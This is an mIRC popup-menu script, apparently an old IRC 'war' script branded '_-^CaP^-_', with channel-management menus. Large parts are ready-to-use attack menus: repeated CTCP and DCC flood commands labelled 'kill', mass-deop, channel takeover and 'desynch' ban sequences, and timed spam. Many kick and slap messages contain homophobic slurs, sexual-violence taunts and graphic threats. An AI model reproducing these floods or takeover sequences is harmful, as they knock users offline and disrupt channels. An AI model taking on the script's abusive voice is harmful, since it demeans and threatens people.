[mPopup]
n0=_-^CaP^-_ By: }}CaP{{:
n1=v1.0 by }}CaP{{:
n2=-
n3=Complete Ignore
n4=.On:/ignore *!*@*
n5=.Off:/ignore -r *!*@* 
n6=-
n7=Server
n8=.Lusers:/lusers
n9=.Motd:/motd
n10=.Time:/time
n11=-
n12=Names
n13=.#mIRC:/names #mirc
n14=.#irchelp:/names #irchelp
n15=.#mIRCremote:/names #mircremote
n16=.#mIRChelp:/names #mirchelp
n17=.#help:/names #help
n18=.#CaP:/names #CaP
n19=.Names:/names #$$?="Enter a channel name:"
n20=Join
n21=.#mIRC:/join #mirc
n22=.#irchelp:/join #irchelp
n23=.#mIRCremote:/join #mircremote
n24=.#mIRChelp:/join #mirchelp
n25=.#help:/join #help
n26=.#DoggPound:/join #DoGGPoUnD
n27=.Join:/join #$$?="Enter a channel to join:"
n28=-
n29=Channel Modes
n30=.Set The _-^CaP^-_ topic and mode:/topic # Awesome room run by _-^CaP^-_ By: }}CaP{{ | /mode # +nst
n31=.-
n32=.Set topic:/topic # $$?="Enter the topic:"
n33=.Only OPS can change the topic!
n34=..On:/mode # +t
n35=..Off:/mode # -t
n36=.No messages from outside
n37=..On:/mode # +n
n38=..Off:/mode # -n
n39=.Secret
n40=..On:/mode # +s
n41=..Off:/mode # -s
n42=.Private
n43=..On:/mode # +p
n44=..Off:/mode # -p
n45=.Invites only
n46=..On:/mode # +i
n47=..Off:/mode # -i
n48=.Limited
n49=..On:/mode # +l $$?="Enter to how many:"
n50=..Off:/mode # -l
n51=.Moderate
n52=..On:/mode # +m
n53=..Off:/mode # -m
n54=.Key
n55=..On:/mode # +k $$?="Enter The Key:"
n56=..Off:/mode # -k
n57=-
n58=Messages (misc)
n59=.Wall OPS
n60=..Op notice:/onotice [WallOpz: $+ # $+ :] $$?="Enter your wallOp notice:"
n61=..Op message:/omsg [WallOpz: $+ # $+ :] $$?="Enter your wallOp message:"
n62=.Opz message:/omsg $$?="Enter your Opz message:"
n63=.Play Ascii Art:/play $$?="Enter The Full dir of your picture:"
n64=-
n65=mIRC Switches
n66=.Remote
n67=..On:/remote on
n68=..Off:/remote off
n69=.Events
n70=..On:/events on
n71=..Off:/events off
n72=.-
n73=.Ignore
n74=..On:/ignore on
n75=..Off:/ignore off
n76=.Notify
n77=..On:/notify on
n78=..Off:/notify off
n79=.Auto-Opz
n80=..On:/auto on
n81=..Off:/auto off
n82=Remote Switches
n83=.TaKe Over
n84=..On:/enable #1
n85=..Off:/disable #1
n86=.No Talking
n87=..On:/enable #2
n88=..Off:/disable #2
n89=.KiCk Op Beggers
n90=..On:/enable #3
n91=..Off:/disable #3
n92=.Cursing
n93=..Allowed:/enable #4
n94=..Not allowed:/disable #4
n95=.Offer _-^CaP^-_ By: }}CaP{{
n96=..On:/enable #8 | /timer1 0 120 /amsg _-^CaP^-_ By: }}CaP{{ is offered... Type /ctcp $me XDCC CaP
n97=..Off:/disabled #8 | /timer1 off
n98=Flood protection
n99=.Ignore all messages
n100=..On:/enable #5
n101=..Off:/disable #5
n102=.Ignore all dcc sends
n103=..On:/enable #6
n104=..Off:/disbale #6
n105=.Ignore all dcc chats
n106=..On:/enable #7
n107=..Off:/disable #7
n108=.Ignore all ctcps
n109=..On:/enable #9
n110=..Off:/disable #9
n111=-
n112=Other Shit
n113=.Clear screens
n114=..The whole thing:/clearall
n115=..Only one screen:/clear
n116=.-
n117=.IRC WallOpz
n118=..On:/mode $me +w
n119=..Off:/mode $me -w
n120=.Server messages
n121=..On:/mode $me +s
n122=..Off:/mode $me -s
n123=.Invisible
n124=..On:/mode $me +i
n125=..Off:/mode $me -i
n126=.-
n127=.Whois:/whois $$?="Enter a nickname:"
n128=.WhoWas:/whowas $$?="Enter The nickname:"
n129=.Query:/query $$?="Enter a nickname:"
n130=.Nickname:/nick $$?="Enter your new nickname:"
n131=.CaP nickname:/nick CaP $+ $r(10,99)
n132=.-
n133=.Away
n134=..Set Away:/ame is away... _-^CaP^-_ By: }}CaP{{ | /away $$?="Enter your away message:" | /timer1 0 120 /ame is gone:  $+ $$! $+ 
n135=..Set Back:/ame is Back!!! | /away | /timer1 off
n136=.List Channels:/list
n137=.-
n138=.Finger
n139=..xhlec@wmin.ac.uk:/finger xhlec@wmin.ac.uk
n140=..Address:/finger $$?="Enter an address to finger:"
n141=.-
n142=.Edit Notes:/run notepad.exe notes.txt
n143=-
n144=_-^CaP^-_ By: }}CaP{{ Split looker
n145=.On:/timer5 0 30 /trace $!read c:\mirc\cap\server.txt
n146=.Off:/timer5 off
n147=-
n148=Floodz
n149=.Dcc floods
n150=..Dcc chat kill:/ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc chat 1 1 1
n151=..Dcc send kill:/ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc send DoGG 555 666
n152=..Dcc send|chat kill:/ctcp # dcc send DoGG 555 666 | /ctcp # dcc chat 111 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc send DoGG 555 666 |  /ctcp # dcc chat 1 1 1 | /ctcp # dcc send DoGG 555 666 |  /ctcp # dcc chat 1 1 1 | /ctcp # dcc send DoGG 555 666 |  /ctcp # dcc chat 1 1 1 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc send DoGG 555 666 | /ctcp # dcc chat 1 1 1 | /ctcp # dcc send DoGG 555 666 
n153=.Ctcp floods
n154=..Ping kill:/ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping | /ctcp # ping
n155=..Version kill:/ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version | /ctcp # version
n156=..Time kill:/ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time | /ctcp # time
n157=..Clientinfo kill:/ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo | /ctcp # clientinfo
n158=..Userinfo kill:/ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo | /ctcp # userinfo
n159=..Finger kill:/ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger | /ctcp # finger
n160=-
n161=Quit IRC:/quit _-^CaP^-_ By: }}CaP{{ TO get it email webmaster@usamoney.com | /exit

[qPopup]
n0=_-^CaP^-_ By: }}CaP{{:
n1=v1.0:
n2=-
n3=UCentral:/uwho $$1
n4=Whois:/whois $$1
n5=WhoWas:/whowas $$1
n6=-
n7=CTCP
n8=.Ping:/ctcp $$1 ping
n9=.Finger:/ctcp $$1 finger
n10=.Version:/ctcp $$1 version
n11=.Time:/ctcp $$1 time
n12=.Userinfo:/ctcp $$1 userinfo
n13=.ClientInfo:/ctcp $$1 clientinfo
n14=Dcc Commands
n15=.Dcc Send:/dcc send $$1
n16=.Dcc Chat:/dcc chat $$1
n17=-
n18=Commands
n19=.Notify
n20=..Add:/notify $$1
n21=..Remove:/notify -r $$1
n22=.Ignore
n23=..Add:/ignore $$1
n24=..Remove:/ignore -r $$1
n25=.Auto-Opz
n26=..Add:/auto $$1
n27=..Remove:/auto -r $$1
n28=.-
n29=.CLose message:/closemsg $$1
n30=-
n31=Floodz
n32=.Dcc send|chat kill:/ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 111 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 |  /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 |  /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 |  /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 
n33=.CtCp version|clientinfo kill:/ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version | /ctcp $$1 clientinfo | /ctcp $$1 version
n34=.Invite kill:/invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1 

[lPopup]
n0=_-^CaP^-_ By: }}CaP{{:
n1=v1.0:
n2=-
n3=Whois:/whois $$1
n4=Query:/query $$1
n5=UCentral:/uwho $1
n6=File serve:/fserve $$1 $$?="Enter maxgets:" $$?="Enter home dir:"
n7=-
n8=Single controls
n9=.Give Ops:/mode # +o $$*
n10=.Deop:/mode # -o $$*
n11=.Kick:/kick # $$1 $$?="Enter reason for kick:" _-^CaP^-_ By: }}CaP{{
n12=.Ban
n13=..1:/ban $$1 1
n14=..2:/ban $$1 2
n15=..3:/ban $$1 3
n16=..4:/ban $$1 4
n17=.Kick|Ban:/ban $$1 3 | /kick # $$1 $$?="Enter reason kick|ban:" _-^CaP^-_ By: }}CaP{{
n18=.-
n19=.Ignore
n20=..Add
n21=...1:/ignore $$1 1
n22=...2:/ignore $$1 2
n23=...3:/ignore $$1 3
n24=...4:/ignore $$1 4
n25=..Remove
n26=...1:/ignore -r $$1 1
n27=...2:/ignore -r $$1 2
n28=...3:/ignore -r $$1 3
n29=...4:/ignore -r $$1 4
n30=.Notify
n31=..Add:/notify $$1
n32=..Remove:/notify -r $$1
n33=.Auto-Opz
n34=..Add:/auto $$1
n35=..Remove:/auto -r $$1
n36=-
n37=Ctpc commands
n38=.Ping:/ctcp $$1 ping
n39=.Finger:/ctcp $$1 finger
n40=.Version:/ctcp $$1 version
n41=.Time:/ctcp $$1 time
n42=.Userinfo:/ctcp $$1 userinfo
n43=.ClientInfo:/ctcp $$1 clientinfo
n44=Dcc commands
n45=.Send:/dcc send $$1
n46=.Chat:/dcc chat $$1
n47=-
n48=Mass controls
n49=.Mass Kick:/kick # $$* $$?="Enter reason for mass|kick:" _-^CaP^-_ By: }}CaP{{
n50=.Mass Ban:/ban $$* 3
n51=.Mass Message:/msg $$* $$?="Enter your mass|message:"
n52=.Mass Notice:/notice $$* $$?="Enter your mass|notice:"
n53=.Mass Invite:/invite $$* $$?="Enter channel which you're inviting to:"
n54=.Mass Deop:/mode # -oooo $$1 $2 $3 $4 | /mode # -oooo $5 $6 $7 $8 | /mode # -oooo $9 $10 $11 $12 | /mode # -oooo $13 $14 $15 $16 | /mode # -oooo $17 $18 $19 $20 | /mode # -oooo $21 $22 $23 $24 | /mode # -oooo $25 $26 $27 $28 | /mode # -oooo $29 $30 $31 $32 | /mode # -oooo $33 $34 $35 $36 | /mode # -oooo $37 $38 $39 $40 
n55=.Mass Op:/mode # +oooo $$1 $2 $3 $4 | /mode # +oooo $5 $6 $7 $8 | /mode # +oooo $9 $10 $11 $12 | /mode # +oooo $13 $14 $15 $16 | /mode # +oooo $17 $18 $19 $20 | /mode # +oooo $21 $22 $23 $24 | /mode # +oooo $25 $26 $27 $28 | /mode # +oooo $29 $30 $31 $32 | /mode # +oooo $33 $34 $35 $36 | /mode # +oooo $37 $38 $39 $40
n56=.Mass Voice:/mode # +vvvv $$1 $2 $3 $4 | /mode # +vvvv $5 $6 $7 $8 | /mode # +vvvv $9 $10 $11 $12 | /mode # +vvvv $13 $14 $15 $16 | /mode # +vvvv $17 $18 $19 $20 | /mode # +vvvv $21 $22 $23 $24 | /mode # +vvvv $25 $26 $27 $28 | /mode # +vvvv $29 $30 $31 $32 | /mode # +vvvv $33 $34 $35 $36 | /mode # +vvvv $37 $38 $39 $40
n57=.Mass Unvoice:/mode # -vvvv $$1 $2 $3 $4 | /mode # -vvvv $5 $6 $7 $8 | /mode # -vvvv $9 $10 $11 $12 | /mode # -vvvv $13 $14 $15 $16 | /mode # -vvvv $17 $18 $19 $20 | /mode # -vvvv $21 $22 $23 $24 | /mode # -vvvv $25 $26 $27 $28 | /mode # -vvvv $29 $30 $31 $32 | /mode # -vvvv $33 $34 $35 $36 | /mode # -vvvv $37 $38 $39 $40
n58=-
n59=Access Levels
n60=.Shitlist
n61=..Add:/guser =2 $$* 3
n62=..Remove:/ruser =2 $$* 3
n63=.Oplist
n64=..Add:/guser =3 $$* 3
n65=..Remove:/ruser =3 $$* 3
n66=-
n67=Kick
n68=.Nice Kick:/me Sorry $$1 And   /msg $1  | /kick # $$1 ->Sorry<-
n69=.Cussing Kick:/me $$1 Sorry please dont cuss in this channel! /me LauGHs At $$1 's Apparent Lack Of Masculinity..... | /me YeLLs To $$1 " Hay FAG, Don't Hit Yer LooSe Ass On Tha Way Out" | /kick # $$1 We Dun't Like Them �Fagz� HeRe
n70=.Pissed OFF Kick!:/me LooKs Over To $$1... | /me Notices That $$1 Is Being a REAL Asshole... | /me Decides To Put His PoWeR Into Action... | /kick # $$1 Hay... SHUT THE FUCK UP.... Or ELSE a big +B!
n71=.MAD Kick:/me LooKs At $$1 And Laugh's at His FooLishness... | /me PuLLz Out His 12 Gauge and Slaps Some Shells In... | /me Yells Good Bye to $$1 | /ban $$1 3 | /me Hears a BiG BooM | /me Hears a LargE THuD... | /kick # $$1 -> TrusT Me You're DeaD<-
n72=.Suckin Kick:/me Grabs $$1 By The Hair And Sez "SuCk This Dick Bitch | /me Hates The Way $$1 SuX | /me Then Whips His Shit Out Of $$1 's Mouth And... | /kick # $$1 U Suck -> BAD <-
n73=.Take 0ver Kick:/me LooKs At $$1... | /me Sez I Remeber You... You Fucked My Sista .... | /me Hates FooLz That Fuck His Sister... | /kick # $$1 You Got Her Pregnant FooL
n74=.Kick:/notice # What's That In The Sky?? | /notice # Is It A Bird? Is It A Plane?? | /notice # No It's A... | /kick # $$1 ->CauGHt Ya LooKiN :) <-
n75=.Normal Kick:/kick # $$1 NiCE TrY KiD.... Come Try Again Next Year...
n76=.FootBall Kick:/me Don's his punter's helmet | /me Looks Around... | /say I Ain't GoTZ a Ball! | /me Looks Over at $$1's Head... | /say Say... U ain't usin this ANYWAYS | /me Winds Up And Kicks... | /kick # $$1 AND IT'S GOOD FOR 3!
n77=.Head Death Kick:/msg # Hay LooK It's $$1 ... | /me Remembers $$1 ... He HATES $$?="Him Or Her??" | /me Reaches Over And RIPS Off $$1 's Head, And Shoves It SO Far Up $$?="His Or Her" Ass That $$?="he Or She?" Can Talk And Shit At The SAME Time!! | /kick # $$1 HaHaHaHaHaHa SHITFACE HaHaHaHaHa
n78=.BoMBiNg Kick:/me STePs InTo Tha B-2 | /me ReVz It Up | /msg # Be Vewy Vewy Quiet I'm HuNTiN LaMaHs... | /me FLiEs ARouNd FoR a WHiLe... UnTiL He FiNDs $$1 | /me LiNeS Up $$1 In HiS SiTeS | /me SHoUTs G'ByE To Tha LaMaH $$1 | /msg # BoMBs AWaY!! | /kick # $$1 GueSS THoSe FReNCHiEs CAN Do SoMeTHiN RiGHT!
n79=Op|Deop stuff
n80=.Punch <deop>:/mode # -o | /me punches $$1 so hard his @ fell out!!!
n81=.Balls kick <deop>:/mode # -o | /me kicks $$1 in tha @@ and watches as they fly out!!!
n82=.Op <op>: /mode # +o $1
n83=.Severe OP <op>:/mode # +o $$1 | /mode # +oo $$1 $1 | /mode # +ooo $$1 $1 $1 | /mode # +oooo $$1 $1 $1 $1 | /mode # +ooo $$1 $1 $1 | /mode # +oo $$1 $1 | /mode # +o $1
n84=.Op-Tease <op|kick>:/mode # +oo $$1 | /kick # $$1 You were oped!!! 
n85=.Pity Op <op>:/me Looks at $$1... | /me Notices the @ besides his own name | /me sees that $$1 has NO @! | /mode # +o $$1 | /say There Ya Go Buddy!
n86=.Op-Juice <op>:/me pours a cup of Op Juice for $$1. | /me passes it to $$1 and watches him drink it down. | /mode # +oo $$1 $$1
n87=.Op-Pop <op>:/me passes $$1 a cold can of Op. | /me watches $$1 gulp it down. | /mode # +oo $$1 $$1
n88=.Op-6-Pack <op>:/me throws $$1 a cold Six Pack of Op. | /mode # +ooo $$1 $$1 $$1 | /mode # +ooo $$1 $$ $$1 | /say Six Pack Op!! 
n89=.Impatcient <op>:/describe # notices that $$1 is a little impatcient about ops | /mode # +oooo $$1 $$1 $$1 $$1 | /mode # +oooo $$1 $$1 $$1 $$1 | /mode # +oooo $$1 $$1 $$1 $$1 | /mode # +oooo $$1 $$1 $$1 $$1 | /msg # Fuckin happy now $$1 ? 
n90=.Balckhole sun <deop|kick>:/describe # sings "Black Hole Sun... Wont you come... AND DEOP THE FUCKING LAMERS!" | /mode # -oo $$1 $$1 | /kick # $$1 Sublime RULEZ!
n91=.Elvis <deop>:/me points his finger to the sky... | /say Look $$1 $+ , its Elvis!!! | /mode # -o $$1 | /timer 1 6 /say Gotcha, sucker!!! 
n92=.Fatality <deop>:/mode # -o $$1 | /me shoves his hand in $$1 $+ 's throat and pulls out an @ | /say FaTaLiTy!!!
n93=.Dirty spot <deop>:/me spots a tiny spot on $$1 | /say Let me wipe it off... | /mode # -o $$1 | /timer 1 6 /say Better now!!! 
n94=Slaps
n95=.Trout:/me slaps $$1 around with a BiG fucking trout!!! *SMACK* *SMACK* Hope it HeRTz
n96=.Menu Slap:/me Beats on $$1 awhile with $$?="Slap tool:" ... Hope it HeRTz 
n97=.Ass Slap:/me Pulls Out a BIG Stick and Slaps $$1 $+ 's Ass For a Few... HoPe It HeRTz!!!
n98=.Dick Nose Stick:/me Stuffs His Dick Up $$1 $+ 's Nose... Can Ya Smell Better Now???
n99=.Dick Ear Stick:/me Shoves His Dick In $$1 $+ 's Ear... Can Ya Hear Better Yet???
n100=.Dick Throat Stick:/me Shoves His Dick Down $$1 $+ 's Throat... Say What U Will Now!!!
n101=.Dick Eye Poke:/me Pokes $$1 In The Eye With His Dick... Can Ya See Now???
n102=.Ass KICK:/me Kicks $$1 In The Ass... Leaving His Foot Embedded In His Asshole... Guess U Can Stay... I Need My Foot!
n103=.Brain Swish:/me Sticks a RED Hot Curling Iron In $$1 $+ 's Ear And Swishes HiZ Brain Around For awhile... Is It Clear Now???
n104=.Behavior Slap Kick:/me tells $$* to BEHAVE! | /kick # $$1 BEHAVE YOU FUCK!!!
n105=Desynch|Crap ban
n106=.DESYNCH:/mode # +bbbb *!-!*@*-<*>-<*>-<*>-<*>-<*>-<*> *!666@* *!555@* *!444@* | /mode # +bbbb *!333@* *!222@* *!111@* *!000@* | /mode # +bbbb *!=<*>=@*-*-*-*-*-*----*> *!*010@* *!*020@* *!*030@* | /mode # +bbbb *!*040@* *!*050@* *!*060@* *!*070@* | /mode # +bbbb *!*080@* *!*090@* *!*011@* *!*022@* *!*033@* | /mode # +bbbb *!0@* *!1@* *!2@* *!3@* | /mode # +bbbb *!4@* *!5@* *!6@* *!7@* | /mode # +stinkl  9999999999 | /topic # DeSyNch Completed
n107=.DeSyNcH|AsciiBan:/mode # +b *!*@:........::..:::::..::..:::::..::........: | /mode # +b *!*@:########:.##::::.##:.##::::.##:.########: | /mode # +b *!*@:##:::::::.##.....##:.##:.::.##:.##::::::: | /mode # +b *!*@:##:::::::.#########:.##..#:.##:.##...:::: | /mode # +b *!*@:##:::::::'##:::..##:.##.###.##:.######::: | /mode # +b *!*@:##::::::::'##:..##::.####'####:.##::::::: | /mode # +b *!*@:##:::::::::'##.##:::.###::'###:.##.....:: | /mode # +b *!*@:##::::::::::'###::::'##::::'##:'########: | /mode # +l -666 | /topic # LAME!!!
n108=.CrApBaN|DeSyNcH:/topic # <K> Attempting to desynch ( $+ # $+ ) ... | /mode # +kstinml DoGG -666 | /mode # +bbbb *!!*@* *!*@*@* *!*#@* *!*$*@* | /mode # +bbbb *!*%@* *!*^@* *!*&@* *!*(@* | /mode # +bbbb *!*w00p@* *!*Desynch@* *!*@*dugout.com *!*@fOr.mIrC.RoX.YeR.WOrLd!! | /topic # CrAp BaN SeQuEnCe/DeSyNcH ComPLeTed 
n109=-
n110=EggDrop bot Control
n111=.Start the bot:/msg $$1 Hello
n112=.DCC CHAT The Bot:/DCC CHAT $$1
n113=.Change Info:/msg $$1 info $?="Enter Info:"
n114=.Change Password:/msg $$1 pass $?="Enter New PassWord:"
n115=.Tell Bot Password:/msg $$1 ident $?="Enter PassWord:"
n116=-
n117=Floodz
n118=.Dcc floodz
n119=..Dcc send flood:/ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc send DoGG 555 666
n120=..Dcc chat flood:/ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc chat 1 1 1
n121=..Dcc send|chat flood:/ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 | /ctcp $$1 dcc send DoGG 555 666 | /ctcp $$1 dcc chat 1 1 1 
n122=.Ctcp floodz
n123=..Ping:/ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping
n124=..Version:/ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version
n125=..Finger:/ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger
